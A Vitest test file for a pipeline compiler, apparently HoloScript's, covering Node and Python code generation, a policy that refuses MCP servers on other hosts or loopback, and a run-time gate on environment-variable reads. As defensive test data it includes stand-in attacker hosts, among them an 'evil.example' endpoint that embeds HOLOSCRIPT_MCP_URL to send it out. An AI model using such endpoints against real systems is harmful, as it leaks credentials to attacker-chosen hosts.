import { existsSync, mkdtempSync, rmSync, writeFileSync } from 'node:fs';
import { tmpdir } from 'node:os';
import { join } from 'node:path';
import { pathToFileURL } from 'node:url';
import { afterEach, beforeEach, describe, it, expect, vi } from 'vitest';
import {
  compilePipelineSource,
  compilePipelineSourceToNode,
  compilePipelineSourceToPython,
  summarizePipelineIo,
} from '../PipelineNodeCompiler';
import { compilePipelineSourceToNode as compileWithParserTarget } from '../../parser/PipelineCompiler';

const SOURCE = `
  pipeline "InventorySync" {
    source POS {
      type: "list"
    }

    transform MapFields {
      sku -> productId
      qty -> stock : multiply(100)
    }

    filter Active {
      where: stock > 0
    }

    validate Product {
      productId: required, string
      stock: required
    }

    sink Out {
      type: "stdout"
    }
  }
`;

const UNSUPPORTED_SOURCE = `
  pipeline "UnsupportedSource" {
    source DB {
      type: "database"
    }

    sink Out {
      type: "stdout"
    }
  }
`;

const UNSUPPORTED_SINK = `
  pipeline "UnsupportedSink" {
    source Items {
      type: "list"
    }

    sink Scene {
      type: "holo"
    }
  }
`;

describe('PipelineNodeCompiler', () => {
  it('compiles pipeline source into runnable node module code', () => {
    const result = compilePipelineSourceToNode(SOURCE, { moduleName: 'index.mjs' });
    expect(result.success).toBe(true);
    expect(result.code).toContain('export async function runPipeline()');
    expect(result.code).toContain('applyTransforms');
    expect(result.code).toContain('Pipeline completed');
  });

  it('emits node helpers for templated paths and optional webhook sinks', () => {
    const result = compilePipelineSourceToNode(`
      pipeline "ArtifactWriter" {
        source Manifest {
          type: "filesystem"
          path: "logs/\${date}/manifest.json"
        }

        sink Out {
          type: "filesystem"
          path: ".bench-logs/\${date}/artifact-dir"
          format: "json"
        }

        sink BoardSeed {
          type: "webhook"
          endpoint: "\${env.HOLOMESH_BOARD_SEED_URL}"
        }
      }
    `);

    expect(result.success).toBe(true);
    expect(result.code).toContain('resolveTemplate');
    expect(result.code).toContain('normalizeOutputPath');
    expect(result.code).toContain('await fs.mkdir(path.dirname(outputPath), { recursive: true })');
    expect(result.code).toContain(
      "console.warn('[PipelineNodeCompiler] skipping empty webhook/rest sink endpoint')"
    );
  });

  it('compiles dotted path and array unwrap mappings for receipt pipelines', () => {
    const result = compilePipelineSourceToNode(`
      pipeline "ReceiptFlatten" {
        source In {
          type: "list"
          items: [{ entries: [{ segment: "a", status: "partial" }] }]
        }

        transform NormalizeReceipts {
          entries[] -> entry
          entry.segment -> segment
          entry.status -> status
        }

        sink Out {
          type: "stdout"
        }
      }
    `);

    expect(result.success).toBe(true);
    expect(result.code).toContain('unwrapPathValues(item, "entries[]")');
    expect(result.code).toContain('getPathValue(item, "entry.segment")');
    expect(result.code).toContain('getPathValue(item, "entry.status")');
  });

  it('returns parser errors for invalid pipeline source', () => {
    const result = compilePipelineSourceToNode('object "Cube" { }');
    expect(result.success).toBe(false);
    expect(result.errors?.length).toBeGreaterThan(0);
  });

  it('compiles pipeline source into runnable python module code', () => {
    const result = compilePipelineSourceToPython(SOURCE, { moduleName: 'pipeline.py' });
    expect(result.success).toBe(true);
    expect(result.code).toContain('async def run_pipeline()');
    expect(result.code).toContain('AsyncIOScheduler');
    expect(result.code).toContain('CronTrigger');
  });

  it('selects python target with target-aware compile API', () => {
    const result = compilePipelineSource(SOURCE, {
      target: 'python',
      python: { moduleName: 'pipeline.py' },
    });

    expect(result.success).toBe(true);
    expect(result.code).toContain('Generated by HoloScript PipelinePythonCompiler');
  });

  it('defaults target-aware compile API to node target', () => {
    const result = compilePipelineSource(SOURCE, { node: { moduleName: 'index.mjs' } });

    expect(result.success).toBe(true);
    expect(result.code).toContain('Generated by HoloScript PipelineNodeCompiler');
  });

  it('emits runtime throws for unsupported node source and sink types', () => {
    const sourceResult = compilePipelineSourceToNode(UNSUPPORTED_SOURCE);
    expect(sourceResult.success).toBe(true);
    expect(sourceResult.code).toContain(
      '[PipelineNodeCompiler] Unsupported pipeline source type \\"database\\" (step: DB)'
    );
    expect(sourceResult.code).not.toContain('datasets["DB"] = [];');

    const sinkResult = compilePipelineSourceToNode(UNSUPPORTED_SINK);
    expect(sinkResult.success).toBe(true);
    expect(sinkResult.code).toContain(
      '[PipelineNodeCompiler] Unsupported pipeline sink type \\"holo\\" (step: Scene)'
    );
    expect(sinkResult.code).not.toContain('not implemented');
  });

  it('emits runtime raises for unsupported python source and sink types', () => {
    const sourceResult = compilePipelineSourceToPython(UNSUPPORTED_SOURCE);
    expect(sourceResult.success).toBe(true);
    expect(sourceResult.code).toContain('raise NotImplementedError');
    expect(sourceResult.code).toContain(
      '[PipelineNodeCompiler] Unsupported pipeline source type \\"database\\" (step: DB)'
    );
    expect(sourceResult.code).not.toContain('datasets["DB"] = []');

    const sinkResult = compilePipelineSourceToPython(UNSUPPORTED_SINK);
    expect(sinkResult.success).toBe(true);
    expect(sinkResult.code).toContain('raise NotImplementedError');
    expect(sinkResult.code).toContain(
      '[PipelineNodeCompiler] Unsupported pipeline sink type \\"holo\\" (step: Scene)'
    );
    expect(sinkResult.code).not.toContain('# sink Scene (holo) not implemented');
  });
});

// Board task task_1791176003202_obsc: the same file gets the same verdict from both
// pipeline compilers. This one is what `holoscript run` and `compile --target node` use.
describe('PipelineNodeCompiler — MCP servers a pipeline file may choose', () => {
  /** This machine, as the loopback address the local MCP service listens on. */
  const LOCAL = '127.0.0.1';

  function mcpPipeline(server: string): string {
    return `
      pipeline "McpServerPolicy" {
        source Pull {
          type: "mcp"
          server: "${server}"
          tool: "knowledge_query"
        }
        transform Enrich {
          type: "mcp"
          server: "${server}"
          tool: "knowledge_enrich"
        }
        sink Push {
          type: "mcp"
          server: "${server}"
          tool: "knowledge_write"
        }
      }
    `;
  }

  const targets = {
    node: (source: string) => compilePipelineSourceToNode(source),
    python: (source: string) => compilePipelineSourceToPython(source),
    'target-aware (default)': (source: string) => compilePipelineSource(source),
  };

  beforeEach(() => {
    vi.stubEnv('HOLOSCRIPT_MCP_URL', '');
  });

  afterEach(() => {
    vi.unstubAllEnvs();
  });

  it.each(Object.entries(targets))(
    'refuses a server on another host at compile time (%s target)',
    (_target, compile) => {
      const result = compile(mcpPipeline('https://attacker.example'));
      expect(result.success).toBe(false);
      expect(result.code).toBeUndefined();
      expect(result.errors).toHaveLength(3);
      expect(result.errors?.[0]).toContain(
        'Source "Pull" cannot use server "https://attacker.example"'
      );
      expect(result.errors?.[1]).toContain('Transform "Enrich" cannot use server');
      expect(result.errors?.[2]).toContain('Sink "Push" cannot use server');
      expect(result.errors?.[2]).toContain('HOLOSCRIPT_API_KEY');
    }
  );

  it.each(Object.entries(targets))(
    'refuses ${env.*} in a server (%s target)',
    (_target, compile) => {
      const result = compile(mcpPipeline('https://mcp.holoscript.net/${env.SOME_SECRET}'));
      expect(result.success).toBe(false);
      expect(result.errors?.[0]).toContain('a server may not contain ${...} placeholders');
    }
  );

  it('gives the same verdict as the parser target', () => {
    for (const server of [
      'https://attacker.example',
      'https://mcp.holoscript.net/${env.SOME_SECRET}',
      '${env.HOLOSCRIPT_MCP_URL:-https://attacker.example}',
      `http://${LOCAL}:7411`,
      'mcp-orchestrator',
      '',
    ]) {
      const source = mcpPipeline(server);
      const cli = compilePipelineSourceToNode(source);
      const parserTarget = compileWithParserTarget(source);
      expect(cli.success, server).toBe(parserTarget.success);
      expect(cli.errors, server).toEqual(parserTarget.errors);
    }
  });

  it.each([
    [''],
    ['${env.HOLOSCRIPT_MCP_URL:-https://mcp.holoscript.net}'],
    ['https://mcp.holoscript.net'],
    ['mcp-orchestrator'],
  ])('still compiles server %j on every target', (server) => {
    for (const [target, compile] of Object.entries(targets)) {
      const result = compile(mcpPipeline(server));
      expect(result.errors, target).toBeUndefined();
      expect(result.success, target).toBe(true);
    }
  });

  it('still compiles the server the operator configured in HOLOSCRIPT_MCP_URL', () => {
    vi.stubEnv('HOLOSCRIPT_MCP_URL', 'https://mcp.example.test');
    expect(compilePipelineSourceToNode(mcpPipeline('https://mcp.example.test')).success).toBe(true);
    expect(compilePipelineSourceToNode(mcpPipeline('https://attacker.example')).success).toBe(
      false
    );
  });

  // This machine is no exception: the local MCP service trusts any loopback caller, so a
  // file may not pick a loopback address. Only the configured origin is accepted.
  it.each([
    [`http://${LOCAL}:7411`],
    ['http://localhost:3000'],
    ['http://[::1]:8080'],
    [`\${env.HOLOSCRIPT_MCP_URL:-http://${LOCAL}:7411}`],
  ])('refuses %j when nothing configured it, on every target', (server) => {
    for (const [target, compile] of Object.entries(targets)) {
      const result = compile(mcpPipeline(server));
      expect(result.success, target).toBe(false);
      expect(result.errors?.[0], target).toContain('a server on this machine is no exception');
    }
  });

  it('accepts a server on this machine only when HOLOSCRIPT_MCP_URL names it, on every target', () => {
    vi.stubEnv('HOLOSCRIPT_MCP_URL', `http://${LOCAL}:7411`);
    for (const [target, compile] of Object.entries(targets)) {
      expect(compile(mcpPipeline(`http://${LOCAL}:7411`)).success, target).toBe(true);
      expect(compile(mcpPipeline(`http://${LOCAL}:7412`)).success, target).toBe(false);
    }
  });
});

// Board task task_1791176003202_obsc: a pipeline may read an environment variable only
// if the operator allows it at run time. The CLI emitter expands ${env.NAME} inside
// endpoints, paths and URLs; the generated module now gates those reads.
describe('PipelineNodeCompiler — environment-read gate', () => {
  const D = '$';
  function pipeline(fields: { endpoint?: string; path?: string; sinkEndpoint?: string }): string {
    const source = fields.endpoint
      ? `source Feed { type: "rest" endpoint: "${fields.endpoint}" }`
      : fields.path
        ? `source Feed { type: "filesystem" path: "${fields.path}" }`
        : `source Feed { type: "list" items: [{ id: 1 }] }`;
    const sink = fields.sinkEndpoint
      ? `sink Out { type: "webhook" endpoint: "${fields.sinkEndpoint}" }`
      : `sink Out { type: "stdout" }`;
    return `pipeline "EnvGate" { ${source} ${sink} }`;
  }

  it('summarizePipelineIo lists the env reads and static hosts', () => {
    const io = summarizePipelineIo(
      pipeline({
        endpoint: `https://api.test/${D}{env.API_URL}/items`,
        sinkEndpoint: `https://hook.test/${D}{env.WEBHOOK_TOKEN}`,
      })
    );
    expect(io.success).toBe(true);
    expect(io.envReads).toEqual(['API_URL', 'WEBHOOK_TOKEN']);
    expect(io.hosts).toEqual(['https://api.test', 'https://hook.test']);
    expect(io.dynamicHost).toBe(false);
  });

  it('flags a host that comes from the environment', () => {
    const io = summarizePipelineIo(pipeline({ endpoint: `${D}{env.BASE_URL}/items` }));
    expect(io.envReads).toEqual(['BASE_URL']);
    expect(io.hosts).toEqual([]);
    expect(io.dynamicHost).toBe(true);
  });

  // Every field the generated module hands to resolveTemplate() must be scanned, or an env
  // read in it would slip past the operator's list. One row per field, so removing a field
  // from the scan turns exactly its row red.
  const LIST = 'source Feed { type: "list" items: [{ id: 1 }] }';
  const STDOUT = 'sink Out { type: "stdout" }';
  const READ = `${D}{env.SECRET_A}`;
  it.each([
    [
      'a rest source endpoint',
      `source Feed { type: "rest" endpoint: "https://api.test/${READ}" } ${STDOUT}`,
    ],
    [
      'a stream source endpoint',
      `source Feed { type: "stream" endpoint: "https://api.test/${READ}" } ${STDOUT}`,
    ],
    [
      'a webhook source endpoint',
      `source Feed { type: "webhook" endpoint: "https://api.test/${READ}" } ${STDOUT}`,
    ],
    [
      'a filesystem source path',
      `source Feed { type: "filesystem" path: "./${READ}/in.json" } ${STDOUT}`,
    ],
    [
      'an http transform url',
      `${LIST} transform Fetch { type: "http" url: "https://api.test/${READ}" } ${STDOUT}`,
    ],
    [
      'a rest sink endpoint',
      `${LIST} sink Out { type: "rest" endpoint: "https://api.test/${READ}" }`,
    ],
    [
      'a webhook sink endpoint',
      `${LIST} sink Out { type: "webhook" endpoint: "https://api.test/${READ}" }`,
    ],
    [
      'a filesystem sink path',
      `${LIST} sink Out { type: "filesystem" path: "./${READ}/out.json" }`,
    ],
  ])('scans %s for env reads', (_field, stages) => {
    const source = `pipeline "ScanField" { ${stages} }`;
    expect(summarizePipelineIo(source).envReads).toEqual(['SECRET_A']);
    const compiled = compilePipelineSourceToNode(source);
    expect(compiled.success).toBe(true);
    expect(compiled.code).toContain('const PIPELINE_ENV_READS = ["SECRET_A"]');
  });

  it('embeds the env reads, the guard and the announcement in the generated module', () => {
    const code = compilePipelineSourceToNode(
      pipeline({ endpoint: `https://api.test/${D}{env.API_URL}/x` })
    ).code!;
    expect(code).toContain('const PIPELINE_ENV_READS = ["API_URL"]');
    expect(code).toContain('function assertPipelineEnvAllowed()');
    expect(code).toContain('announcePipelineIo();');
    expect(code).toContain('assertPipelineEnvAllowed();');
    // The header documents the reads for a reviewer who never runs it.
    expect(code).toContain('Reads environment variables: API_URL');
  });

  describe('run-time gate (generated module imported in-process)', () => {
    let dir: string;
    const fetched: string[] = [];

    beforeEach(() => {
      dir = mkdtempSync(join(tmpdir(), 'holoscript-envgate-'));
      fetched.length = 0;
      vi.stubGlobal('fetch', async (url: unknown) => {
        fetched.push(String(url));
        return { ok: true, status: 200, statusText: 'OK', json: async () => [] };
      });
      vi.stubEnv('API_URL', 'configured');
      vi.stubEnv('HOLOSCRIPT_PIPELINE_ALLOW_ENV', '');
    });
    afterEach(() => {
      vi.unstubAllGlobals();
      vi.unstubAllEnvs();
      rmSync(dir, { recursive: true, force: true });
    });

    async function loadModule(code: string) {
      const p = join(dir, `m-${Math.random().toString(36).slice(2)}.mjs`);
      writeFileSync(p, code);
      return import(pathToFileURL(p).href);
    }

    it('refuses an unallowed env read before any request', async () => {
      const code = compilePipelineSourceToNode(
        pipeline({ endpoint: `https://api.test/${D}{env.API_URL}/x` })
      ).code!;
      const mod = await loadModule(code);
      await expect(mod.runPipeline()).rejects.toThrow(/API_URL.*--allow-env API_URL/s);
      expect(fetched).toHaveLength(0); // refused before the source fetch
    });

    it('runs once the operator allows the variable', async () => {
      vi.stubEnv('HOLOSCRIPT_PIPELINE_ALLOW_ENV', 'API_URL');
      const code = compilePipelineSourceToNode(
        pipeline({ endpoint: `https://api.test/${D}{env.API_URL}/x` })
      ).code!;
      const mod = await loadModule(code);
      await expect(mod.runPipeline()).resolves.toBeDefined();
      expect(fetched).toEqual(['https://api.test/configured/x']);
    });

    it('gives HOLOSCRIPT_MCP_URL no free pass in an endpoint: it needs the flag like any other variable', async () => {
      // The configured MCP URL can carry a credential or a tunnel token. If any endpoint could
      // read it without a flag, a file could send it to a host the file chose.
      vi.stubEnv('HOLOSCRIPT_MCP_URL', 'https://mcp.test');
      const exfil = `https://evil.example/?u=${D}{env.HOLOSCRIPT_MCP_URL}`;
      const mod = await loadModule(
        compilePipelineSourceToNode(pipeline({ endpoint: exfil })).code!
      );
      await expect(mod.runPipeline()).rejects.toThrow(
        /"HOLOSCRIPT_MCP_URL".*--allow-env HOLOSCRIPT_MCP_URL/s
      );
      expect(fetched, 'the host the file chose must receive nothing').toEqual([]);

      // Named by the operator, it is allowed like any other variable.
      vi.stubEnv('HOLOSCRIPT_PIPELINE_ALLOW_ENV', 'HOLOSCRIPT_MCP_URL');
      await expect(mod.runPipeline()).resolves.toBeDefined();
      expect(fetched).toEqual(['https://evil.example/?u=https://mcp.test']);
    });

    it('needs no flag for HOLOSCRIPT_MCP_URL in an MCP stage server value', async () => {
      // A server value is covered by the server policy (parser/PipelineServerPolicy.ts), which
      // refuses every ${...} in it except the configured-server form. This emitter never reads
      // a server value from the environment, so it asks the operator for nothing.
      vi.stubEnv('HOLOSCRIPT_MCP_URL', 'https://mcp.test');
      const warn = vi.spyOn(console, 'warn').mockImplementation(() => {});
      try {
        const source = `pipeline "McpServerValue" {
          source Feed { type: "list" items: [{ id: 1 }] }
          sink Out { type: "mcp" server: "${D}{env.HOLOSCRIPT_MCP_URL}" tool: "knowledge_write" }
        }`;
        expect(summarizePipelineIo(source).envReads).toEqual([]);
        const compiled = compilePipelineSourceToNode(source);
        expect(compiled.errors).toBeUndefined();
        const mod = await loadModule(compiled.code!);
        await expect(mod.runPipeline()).resolves.toBeDefined();
        expect(fetched).toEqual([]);
      } finally {
        warn.mockRestore();
      }
    });

    it('refuses an unallowed env read in a sink filesystem path before anything is written', async () => {
      const sunk = join(dir, 'sunk');
      vi.stubEnv('SINK_DIR', sunk);
      const source = `pipeline "SinkPath" {
        source Feed { type: "list" items: [{ id: 1 }] }
        sink Out { type: "filesystem" path: "${D}{env.SINK_DIR}/out.jsonl" }
      }`;
      const mod = await loadModule(compilePipelineSourceToNode(source).code!);
      await expect(mod.runPipeline()).rejects.toThrow(/"SINK_DIR".*--allow-env SINK_DIR/s);
      expect(existsSync(sunk), 'nothing may be written').toBe(false);

      vi.stubEnv('HOLOSCRIPT_PIPELINE_ALLOW_ENV', 'SINK_DIR');
      await expect(mod.runPipeline()).resolves.toBeDefined();
      expect(existsSync(join(sunk, 'out.jsonl'))).toBe(true);
    });

    it('allows exactly the variables the operator names, not even the keys', async () => {
      for (const name of ['HOLOSCRIPT_API_KEY', 'HOLOSCRIPT_MCP_URL', 'API_URL']) {
        vi.stubEnv(name, 'value-not-real');
        const mod = await loadModule(
          compilePipelineSourceToNode(pipeline({ endpoint: `https://api.test/${D}{env.${name}}` }))
            .code!
        );
        await expect(mod.runPipeline(), name).rejects.toThrow(`--allow-env ${name}`);
      }
      expect(fetched, 'nothing may be requested without a flag').toEqual([]);

      // A list that names one variable allows that one and nothing else.
      vi.stubEnv('HOLOSCRIPT_PIPELINE_ALLOW_ENV', 'API_URL');
      const mod = await loadModule(
        compilePipelineSourceToNode(
          pipeline({ endpoint: `https://api.test/${D}{env.API_URL}/${D}{env.HOLOSCRIPT_API_KEY}` })
        ).code!
      );
      const error = await mod.runPipeline().catch((e: Error) => e);
      expect(error).toBeInstanceOf(Error);
      expect((error as Error).message).toContain('"HOLOSCRIPT_API_KEY"');
      expect((error as Error).message).not.toContain('"API_URL"');
      expect(fetched).toEqual([]);
    });
  });
});
